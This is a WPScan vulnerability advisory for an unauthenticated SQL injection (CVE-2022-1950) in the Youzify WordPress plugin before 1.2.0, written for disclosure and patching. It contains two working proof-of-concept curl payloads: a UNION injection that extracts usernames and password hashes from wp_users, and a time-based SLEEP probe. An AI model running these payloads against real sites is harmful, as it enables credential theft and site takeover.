WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Youzify < 1.2.0 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT CONCAT(user_login,CHAR(0x3a),user_pass) from wp_users),2,3,4-- -"

time curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(5)))XVfJ)"

Affects Plugins

youzify
Fixed in version 1.2.0

References

CVE
CVE-2022-1950

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
4352283f-dd43-4827-b417-0c55d0f4637d

Timeline

Publicly Published

2022-07-11 (about 8 months ago)

Added

2022-07-11 (about 8 months ago)

Last Updated

2022-07-11 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin